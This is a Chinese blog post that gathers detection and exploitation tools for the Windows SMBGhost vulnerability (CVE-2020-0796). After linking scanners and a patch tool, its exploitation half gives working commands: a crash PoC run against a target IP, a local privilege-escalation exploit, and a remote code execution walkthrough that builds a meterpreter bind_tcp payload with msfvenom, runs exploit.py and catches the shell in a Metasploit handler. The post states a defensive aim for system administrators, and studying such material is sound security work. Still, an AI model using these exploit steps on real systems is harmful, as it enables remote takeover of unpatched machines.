cve-2020-0796_CVE20200796 漏洞检测及利用工具

自2020年3月12日,微软正式发布CVE-2020-0796高危漏洞补丁后,时隔数月,远程利用PoC代码已经被公布,这也意味着这场漏洞风波即将告一段落了。

本文汇总了多个CVE-2020-0796 漏洞检测及利用工具,方便系统管理员对未修复漏洞的系统进行检测和防护。


漏洞检测篇

git 脚本检测:

https://github.com/ollypwn/SMBGhost

检测返回的数据包中SMB压缩版本,这种检测方式打过补丁依然会误报。

12b6a0b64edd3b433f419eaf57db49c1.png

奇安信检测工具:

http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

适用于局域网批量检测,快速查找未打补丁的机器。

e3a2058f100d542f3160f0912ee11bd9.png

腾讯电脑管家SMB漏洞修复工具:

http://dlied6.qq.com/invc/QQPatch/QuickFix_SMB0796.exe

适用于个人用户检测,一键快速检测和修复。

be45caa40594991f3bb01fbadee27150.png

漏洞利用篇

蓝屏PoC:

https://github.com/eerykitty/CVE-2020-0796-PoC

使用两台虚拟机作为漏洞演示,一台win10 1903版本,一台是Kali Linux。

git clone https://github.com/eerykitty/CVE-2020-0796-PoC.gitpython3 setup.py installpython3 CVE-2020-0796.py 192.168.172.128

4edaec4ad27b6500f502c633846d15a0.png

本地提权PoC:

https://github.com/danigargu/CVE-2020-0796

本地普通用户Bypass执行提权exp后弹出cmd窗口,成功获取system权限。

3fa16322dcc146a18696e56a7bfaddd4.png

远程利用PoC:

https://github.com/chompie1337/SMBGhost_RCE_PoC

漏洞演示过程:

1、使用msfvenom生成payload

msfvenom  -p windows/x64/meterpreter/bind_tcp  lport=1234 -f py -o evil.py

2、将evil.py 生成的code,替换到exploit.py的USER_PAYLOAD参数,并把参数buf改为USER_PAYLOAD。

root@kali:~# git clone https://github.com/chompie1337/SMBGhost_RCE_PoC.gitroot@kali:~# cd SMBGhost_RCE_PoC/root@kali:~/SMBGhost_RCE_PoC# lsexploit.py  kernel_shellcode.asm  lznt1.py  __pycache__  README.md  smb_win.py

3、运行exploit.py

python3 exploit.py -ip 192.168.172.128

b9dedc7d14b19f9caa0bf95838d428ab.png

4、启动msf监听本地端口(PS:监听端口如果一直收不到shell,可重新运行一次。)

msf5 > use exploit/multi/handlermsf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcppayload => windows/x64/meterpreter/bind_tcpmsf5 exploit(multi/handler) > set lport 1234lport => 1234msf5 exploit(multi/handler) > set rhost 192.168.172.128rhost => 192.168.172.128msf5 exploit(multi/handler) > exploit

f94147523b2707c2458ef0e4f34760e5.png

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值